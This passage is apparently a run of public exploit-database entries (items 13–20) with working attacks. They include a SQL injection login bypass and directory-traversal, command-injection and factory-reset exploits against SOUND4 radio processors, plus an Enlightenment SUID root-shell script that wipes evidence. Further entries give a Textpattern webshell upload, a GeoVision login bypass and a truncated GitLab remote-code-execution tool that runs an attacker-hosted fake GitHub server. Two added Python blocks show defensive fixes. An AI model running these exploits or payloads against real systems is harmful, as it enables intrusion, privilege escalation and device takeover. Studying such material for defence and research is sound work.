      With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming.

      SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper.

      Desc: The application suffers from an SQL Injection vulnerability. Input passed through the 'password' POST parameter in 'index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism.

      Tested on: Apache/2.4.25 (Unix)
                 OpenSSL/1.0.2k
                 PHP/7.1.1
                 GNU/Linux 5.10.43 (armv7l)
                 GNU/Linux 4.9.228 (armv7l)

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
      Macedonian Information Security Research and Development Laboratory
      Zero Science Lab - https://www.zeroscience.mk - @zeroscience

      Advisory ID: ZSL-2022-5726
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5726.php

      26.09.2022

      --

      ```http
      POST /index.php HTTP/1.1

      username=t00t&password='+joxy--+z
      ```
13. ## Exploit Title: Enlightenment v0.25.3 - Privilege escalation
## Author: nu11secur1ty
## Date: 12.26.2022
## Vendor: https://www.enlightenment.org/
## Software: https://www.enlightenment.org/download
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706
## CVE ID: CVE-2022-37706

## Description:
The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation. Enlightenment_sys in Enlightenment before 0.25.3 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring. If the attacker has local access to a machine on which Enlightenment is installed, they can use this vulnerability to do very dangerous things.

## STATUS: CRITICAL Vulnerability

## Tested on:
```bash
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.10
DISTRIB_CODENAME=kinetic
DISTRIB_DESCRIPTION="Ubuntu 22.10"
PRETTY_NAME="Ubuntu 22.10"
NAME="Ubuntu"
VERSION_ID="22.10"
VERSION="22.10 (Kinetic Kudu)"
VERSION_CODENAME=kinetic
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=kinetic
LOGO=ubuntu-logo
```

[+] Exploit:
```bash
#!/usr/bin/bash
# Idea by MaherAzzouz
# Development by nu11secur1ty

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

# The actual problem
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit

echo "[+] Welcome to the rabbit hole :)"

${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

read -p "Press any key to clean the evidence..."
echo -e "Please wait... "
sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net
echo -e "Done; Everything is clear ;)"
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)

## Proof and Exploit:
[href](https://streamable.com/zflbgg)

## Time spent
`01:00:00`

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
14. # Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit
# Exploit Author: LiquidWorm

Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
                  Impact/Pulse/First (Version 2: 1.1/2.15)
                  Impact/Pulse/First (Version 1: 2.1/1.69)
                  Impact/Pulse Eco 1.16
                  Voice Processing:
                  BigVoice4 1.2
                  BigVoice2 1.30
                  Web-Audio Streaming:
                  Stream 1.1/2.4.29
                  Watermarking:
                  WM2 (Kantar Media) 1.11

Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations.

With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming.

SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper.

Desc: The application suffers from an unauthenticated directory traversal file write vulnerability. Input passed through the 'filename' POST parameter called by the 'upgrade.php' script is not properly verified before being used to upload .upgbox Firmware files. This can be exploited to write to arbitrary locations on the system via directory traversal attacks.

Tested on: Apache/2.4.25 (Unix)
           OpenSSL/1.0.2k
           PHP/7.1.1
           GNU/Linux 5.10.43 (armv7l)
           GNU/Linux 4.9.228 (armv7l)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            Macedonian Information Security Research and Development Laboratory
                            Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2022-5730
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5730.php

26.09.2022

--

POST /cgi-bin/upload.cgi HTTP/1.1
Host: RAAAADIOOO
Content-Type: multipart/form-data; boundary=----zzzzz
User-Agent: TheViewing/05
Accept-Encoding: gzip, deflate

------zzzzz
Content-Disposition: form-data; name="upgfile"; filename="../../../../../../../tmp/pwned"
Content-Type: application/octet-stream

t00t
------zzzzz
Content-Disposition: form-data; name="submit"

Do it
------zzzzz--
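A defensive counterpart to the traversal above, added here as an example and not SOUND4's code: a server-side check for the multipart filename of a firmware upload that rejects the PoC's `../../../../../../../tmp/pwned` and maps only a plain `.upgbox` name into the staging directory. The staging directory path, the character allowlist and the `.upgbox`-only rule are assumptions; only the `upgfile` part name and the suffix come from the advisory.

```python
import os
import re
from typing import Optional, Tuple

# Assumed values for this example; the advisory names neither the staging
# directory nor a naming rule, only that the endpoint accepts .upgbox files.
UPLOAD_DIR = "/tmp/upgrades"
ALLOWED_SUFFIX = ".upgbox"
# One plain component: starts alphanumeric, then a conservative character set.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")

_DISPOSITION_FILENAME = re.compile(r';\s*filename="([^"]*)"')


def filename_from_disposition(header: str) -> Optional[str]:
    """Extract the filename parameter of a multipart Content-Disposition
    header value, e.g. 'form-data; name="upgfile"; filename="x.upgbox"'.
    Returns None when no filename parameter is present."""
    match = _DISPOSITION_FILENAME.search(header)
    return match.group(1) if match else None


def check_upload_name(upload_dir: str,
                      client_filename: Optional[str]) -> Tuple[Optional[str], str]:
    """Map a client-supplied filename to a path under upload_dir.

    Returns (absolute_path, "ok") when the name is acceptable, otherwise
    (None, reason). The name is untrusted input: anything that is not a
    single plain component with the expected suffix is rejected outright,
    and the final path is re-checked for containment after symlink
    resolution so a later refactor cannot quietly reintroduce traversal.
    """
    if not client_filename:
        return None, "missing filename"
    # NUL and other control characters have no place in a filename.
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in client_filename):
        return None, "control character in filename"
    # Both separator styles: a Windows-minded client may send backslashes,
    # and the PoC relies on "../" sequences being honoured verbatim.
    if "/" in client_filename or "\\" in client_filename:
        return None, "path separator in filename"
    if client_filename in (".", "..") or not SAFE_NAME.match(client_filename):
        return None, "filename outside allowed character set"
    if not client_filename.lower().endswith(ALLOWED_SUFFIX):
        return None, "unexpected file type"
    root = os.path.realpath(upload_dir)
    candidate = os.path.realpath(os.path.join(root, client_filename))
    # Defence in depth: the resolved path must still sit under the root.
    if os.path.commonpath([root, candidate]) != root:
        return None, "resolved path escapes upload directory"
    return candidate, "ok"


if __name__ == "__main__":
    # Constructed header taken from the advisory's PoC request.
    poc = 'form-data; name="upgfile"; filename="../../../../../../../tmp/pwned"'
    print(check_upload_name(UPLOAD_DIR, filename_from_disposition(poc)))
    print(check_upload_name(UPLOAD_DIR, "firmware-2.15.upgbox"))
```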
15. # Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE)
# Exploit Author: LiquidWorm

Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
                  Impact/Pulse/First (Version 2: 1.1/2.15)
                  Impact/Pulse/First (Version 1: 2.1/1.69)
                  Impact/Pulse Eco 1.16
                  Voice Processing:
                  BigVoice4 1.2
                  BigVoice2 1.30
                  Web-Audio Streaming:
                  Stream 1.1/2.4.29
                  Watermarking:
                  WM2 (Kantar Media) 1.11

Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations.

With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming.

SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper.

Desc: The application suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'password' HTTP POST parameter through index.php and login.php script.

========================================================================
/var/www/login.php:
-------------------
09: if (isset($_POST['username']) && isset($_POST['password'])) {
10:
11:     $ret = -1;
12:     // remarque: Check Password for broken, only admin/admin as valid user/password
13:     exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret);
========================================================================

Tested on: Apache/2.4.25 (Unix)
           OpenSSL/1.0.2k
           PHP/7.1.1
           GNU/Linux 5.10.43 (armv7l)
           GNU/Linux 4.9.228 (armv7l)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            Macedonian Information Security Research and Development Laboratory
                            Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2022-5738
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5738.php

26.09.2022

--

> curl --fail -XPOST -sko nul https://RADIOGUGU/index.php --data "username=ZSL&password=`id>/var/www/g`" && curl -sk https://RADIOGUGU/g
uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)
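The hardened counterpart of the exec() call on line 13 of login.php, written in Python as an added example rather than SOUND4's PHP: the checker binary path and the `_check_pwd_` verb come from the listing above, while the username allowlist, the timeout and the injectable `runner` are assumptions. The point it shows is that argv passed as a list and a password delivered on stdin give a shell nothing to interpret, so the PoC's backtick payload stays a literal string.

```python
import re
import subprocess
from typing import Any, Callable, List

# Path and verb taken from the advisory's login.php listing; the rest of this
# block is an assumed hardening, not vendor code.
CHECKER = "/opt/sound4/sound4server"
# Assumed allowlist: the checker only knows admin, so a strict username
# shape costs nothing and removes a whole class of surprises.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def vulnerable_shell_line(username: str, password: str) -> str:
    """The string that line 13 of login.php hands to exec(): both POST values
    are spliced straight into a shell command line. Built here only to show
    what the shell would see; this example never executes it."""
    return f'echo {password} | {CHECKER} _check_pwd_ "{username}";'


def build_check_argv(username: str) -> List[str]:
    """argv for the checker as a list. No shell parses it, so backticks,
    quotes, pipes or semicolons in the value remain literal characters."""
    return [CHECKER, "_check_pwd_", username]


def check_password(username: str, password: str,
                   runner: Callable[..., Any] = subprocess.run) -> bool:
    """Hardened replacement for the exec() call on line 13 of login.php.

    - The username must match a strict allowlist before anything runs.
    - The password never touches argv or a shell; it is written to the
      checker's stdin, the same channel the original `echo ... |` pipe used.
    - `runner` is injectable so the control flow can be exercised without
      the proprietary binary being present.
    """
    if not USERNAME_RE.match(username):
        return False
    # A newline would end the stdin line early; NUL cannot be passed at all.
    if "\n" in password or "\x00" in password or not (1 <= len(password) <= 256):
        return False
    try:
        proc = runner(build_check_argv(username),
                      input=(password + "\n").encode(),
                      capture_output=True,
                      timeout=5)
    except (OSError, subprocess.SubprocessError):
        # Missing binary or a hung checker is an authentication failure,
        # never a pass-through.
        return False
    return proc.returncode == 0


if __name__ == "__main__":
    # Constructed input reproducing the advisory's PoC password.
    poc_password = "`id>/var/www/g`"
    print("shell would see :", vulnerable_shell_line("ZSL", poc_password))
    print("argv list       :", build_check_argv("ZSL"))
```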
16. # Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset
# Exploit Author: LiquidWorm

Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
                  Impact/Pulse/First (Version 2: 1.1/2.15)
                  Impact/Pulse/First (Version 1: 2.1/1.69)
                  Impact/Pulse Eco 1.16
                  Voice Processing:
                  BigVoice4 1.2
                  BigVoice2 1.30
                  Web-Audio Streaming:
                  Stream 1.1/2.4.29
                  Watermarking:
                  WM2 (Kantar Media) 1.11

Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations.

With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming.

SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper.

Desc: The device allows unauthenticated attackers to visit the unprotected /usr/cgi-bin/restorefactory.cgi endpoint and reset the device to its factory default configuration. Once a POST request is made, the device will reboot with its default settings allowing the attacker to bypass authentication and take full control of the system.

Tested on: Apache/2.4.25 (Unix)
           OpenSSL/1.0.2k
           PHP/7.1.1
           GNU/Linux 5.10.43 (armv7l)
           GNU/Linux 4.9.228 (armv7l)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            Macedonian Information Security Research and Development Laboratory
                            Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2022-5742
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5742.php

26.09.2022

--

> curl -kX POST "https://RADIO/cgi-bin/restorefactory.cgi" --data "0x539" \
> sleep 120 #login admin:admin
17. ## Exploit Title: Bangresto 1.0 - SQL Injection
## Exploit Author: nu11secur1ty
## Date: 12.16.2022
## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
## Demo: https://axcora.my.id/bangrestoapp/start.php
## Software: https://github.com/mesinkasir/bangresto
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto

## Description:
The `itemID` parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the itemID parameter, and a database error message was returned. The attacker can steal all information from the database of this application.

## STATUS: CRITICAL Vulnerability

[+] Payload:
```MySQL
---
Parameter: itemID (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT (ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)

## Proof and Exploit:
[href](https://streamable.com/moapnd)

## Time spent
`00:30:00`

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
18. # Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://textpattern.com/
# Version : 4.8.8
# Tested on: windows 11 xammp | Kali linux
# Category: WebApp
# Google Dork: intext:"Published with Textpattern CMS"
# Date: 10/09/2022
#
######## Description ########
#
# Step 1: Log in to the admin account and go to the site settings
# Step 2: Upload a file to the web site and select rce.php
# Step 3: Upload your webshell, that's it...
#
######## Proof of Concept ########

========>>> START REQUEST <<<=========

############# POST REQUEST (FILE UPLOAD) ############################## (1)

POST /textpattern/index.php?event=file HTTP/1.1
Host: localhost
Content-Length: 1038
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/textpattern/index.php?event=file
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin
Connection: close

------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="fileInputOrder"

1/1
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="app_mode"

async
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2000000
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="event"

file
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="step"

file_insert
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="_txp_token"

16ea3b64ca6379aee9599586dae73a5d
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="thefile[]"; filename="rce.php"
Content-Type: application/octet-stream

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundaryMgUEFltFdqBVvdJu--

############ POST RESPONSE (FILE UPLOAD) ######### (1)

HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:28:57 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
X-Textpattern-Runtime: 35.38 ms
X-Textpattern-Querytime: 9.55 ms
X-Textpattern-Queries: 16
X-Textpattern-Memory: 2893 kB
Content-Length: 270
Connection: close
Content-Type: text/javascript; charset=utf-8

___________________________________________________________________________________________________________________________________________________

############ REQUEST TO THE PAYLOAD ############################### (2)

GET /files/c.php?cmd=whoami HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login_public=4353608be0admin
Connection: close

############ RESPONSE THE PAYLOAD ############################### (2)

HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:33:06 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Content-Length: 29
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>alpernae\alperen
</pre>

========>>> END REQUEST <<<=========
19. # Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass
# Device name: GV-ADR2701
# Date: 26 December, 2020
# Exploit Author: Chan Nyein Wai
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Firmware Version: V1.00_2017_12_15
# Tested on: windows 10

# Exploitation

1. Capture the login request with Burp and intercept the response to that request.

Request:
```
PUT /LAPI/V1.0/Channel/0/System/Login HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA==
Content-Length: 46
Origin: http://10.10.10.10
Connection: close
Referer: http://10.10.10.10/index.htm?clientIpAddr=182.168.10.10&IsRemote=0
Cookie: isAutoStartVideo=1

{"UserName":"admin","Password":"0X]&0D]]05"}
```

2. The following is the normal response when you log in to the server.
```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN

{
  "Response": {
    "ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
    "CreatedID": -1,
    "StatusCode": 460,
    "StatusString": "PasswdError",
    "Data": "null"
  }
}
```

By editing the response to the following, you can successfully log in to the web application.
```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN

{
  "Response": {
    "ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
    "CreatedID": -1,
    "StatusCode": 0,
    "StatusString": "Succeed",
    "Data": "null"
  }
}
```
20. # Exploit Title: GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-12-25
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install/
# Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3.1
# Tested on: 'gitlab/gitlab-ce:15.3.0-ce.0' Docker container (vulnerable application), 'Ubuntu 20.04.5 LTS' with 'Python 3.8.10' (script execution)
# CVE: CVE-2022-2884
# Category: WebApps
# Repository: https://github.com/m3ssap0/gitlab_rce_cve-2022-2884
# Credits: yvvdwf (https://hackerone.com/reports/1672388)

# This is a Python3 program that exploits GitLab authenticated RCE vulnerability known as CVE-2022-2884.
# A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3,
# 15.3 to 15.3.1 allows an authenticated user to achieve remote code execution
# via the Import from GitHub API endpoint.
# https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/

# DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments.
# Please use this tool responsibly. I do not take responsibility for the way in which any one uses
# this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.

import argparse
import logging
import validators
import random
import string
import requests
import time
import base64
import sys
from flask import Flask, current_app, request
from multiprocessing import Process

VERSION = "v1.0 (2022-12-25)"
DEFAULT_LOGGING_LEVEL = logging.INFO

app = Flask(__name__)


def parse_arguments():
    parser = argparse.ArgumentParser(
        description=f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}"
    )
    parser.add_argument("-u", "--url", required=True, help="URL of the victim GitLab")
    parser.add_argument("-pt", "--private-token", required=True, help="private token of GitLab")
    parser.add_argument("-tn", "--target-namespace", required=False, default="root", help="target namespace of GitLab (default is 'root')")
    parser.add_argument("-a", "--address", required=True, help="IP address of the attacker machine")
    parser.add_argument("-p", "--port", required=False, type=int, default=1337, help="TCP port of the attacker machine (default is 1337)")
    parser.add_argument("-s", "--https", action="store_true", required=False, default=False, help="set if the attacker machine is exposed via HTTPS")
    parser.add_argument("-c", "--command", required=True, help="the command to execute")
    parser.add_argument("-d", "--delay", type=float, required=False, help="seconds of delay to wait for the exploit to complete")
    parser.add_argument("-v", "--verbose", action="store_true", required=False, default=False, help="verbose mode")
    return parser.parse_args()


def validate_input(args):
    try:
        validators.url(args.url)
    except validators.ValidationFailure:
        raise ValueError("Invalid target URL!")
    if len(args.private_token.strip()) < 1 and not args.private_token.strip().startswith("glpat-"):
        raise ValueError("Invalid GitLab private token!")
    if len(args.target_namespace.strip()) < 1:
        raise ValueError("Invalid GitLab target namespace!")
    try:
        validators.ipv4(args.address)
    except validators.ValidationFailure:
        raise ValueError("Invalid attacker IP address!")
    if args.port < 1 or args.port > 65535:
        raise ValueError("Invalid attacker TCP port!")
    if len(args.command.strip()) < 1:
        raise ValueError("Invalid command!")
    if args.delay is not None and args.delay <= 0.0:
        raise ValueError("Invalid delay!")


def generate_random_string(length):
    letters = string.ascii_lowercase + string.ascii_uppercase + string.digits
    return ''.join(random.choice(letters) for i in range(length))


def generate_random_lowercase_string(length):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(length))


def generate_random_number(length):
    letters = string.digits
    result = "0"
    while result.startswith("0"):
        result = ''.join(random.choice(letters) for i in range(length))
    return result


def base64encode(to_encode):
    return base64.b64encode(to_encode.encode("ascii")).decode("ascii")


def send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id):
    logging.info("Sending request to target GitLab.")
    protocol = "http"
    if is_https:
        protocol += "s"
    headers = {
        "Content-Type": "application/json",
        "PRIVATE-TOKEN": private_token,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
    }
    fake_personal_access_token = "ghp_" + generate_random_string(36)
    new_name = generate_random_lowercase_string(8)
    logging.debug("Random generated parameters of the request:")
    logging.debug(f"              fake_repo_id = {fake_repo_id}")
    logging.debug(f"fake_personal_access_token = {fake_personal_access_token}")
    logging.debug(f"                  new_name = {new_name}")
    payload = {
        "personal_access_token": fake_personal_access_token,
        "repo_id": fake_repo_id,
        "target_namespace": target_namespace,
        "new_name": new_name,
        "github_hostname": f"{protocol}://{address}:{port}"
    }
    target_endpoint = f"{url}"
    if not target_endpoint.endswith("/"):
        target_endpoint = f"{target_endpoint}/"
    target_endpoint = f"{target_endpoint}api/v4/import/github"
    try:
        r = requests.post(target_endpoint, headers=headers, json=payload)
        logging.debug("Response:")
        logging.debug(f"status_code = {r.status_code}")
        logging.debug(f"       text = {r.text}")
        logging.info(f"Request sent to target GitLab (HTTP {r.status_code}).")
        if r.status_code != 201:
            logging.fatal("Wrong response received from the target GitLab.")
            logging.debug(f"       text = {r.text}")
            raise Exception("Wrong response received from the target GitLab.")
    except:
        logging.fatal("Error in contacting the target GitLab.")
        raise Exception("Error in contacting the target GitLab.")


def is_server_alive(address, port, is_https):
    protocol = "http"
    if is_https:
        protocol += "s"
    try:
        r = requests.get(f"{protocol}://{address}:{port}/")
        if r.status_code == 200 and "The server is running." in r.text:
            return True
        else:
            return False
    except:
        return False


def start_fake_github_server(address, port, is_https, command, fake_repo_id):
    app.config["address"] = address
    app.config["port"] = port
    protocol = "http"
    if is_https:
        protocol += "s"
    app.config["attacker_server"] = f"{protocol}://{address}:{port}"
    app.config["command"] = command
    app.config["fake_user"] = generate_random_lowercase_string(8)
    app.config["fake_user_id"] = generate_random_number(8)
    app.config["fake_repo"] = generate_random_lowercase_string(8)
    app.config["fake_repo_id"] = fake_repo_id
    app.config["fake_issue_id"] = generate_random_number(9)
    app.run("0.0.0.0", port)


def encode_command(command):
    encoded_command = ""
    for c in command:
        encoded_command += ("<< " + str(ord(c)) + ".chr ")
    encoded_command += "<<"
    logging.debug(f"encoded_command = {encoded_command}")
    return encoded_command


def generate_rce_payload(command):
    logging.debug("Crafting RCE payload:")
    logging.debug(f"    command = {command}")
    encoded_command = encode_command(command)
    # Useful in order to prevent escaping hell...
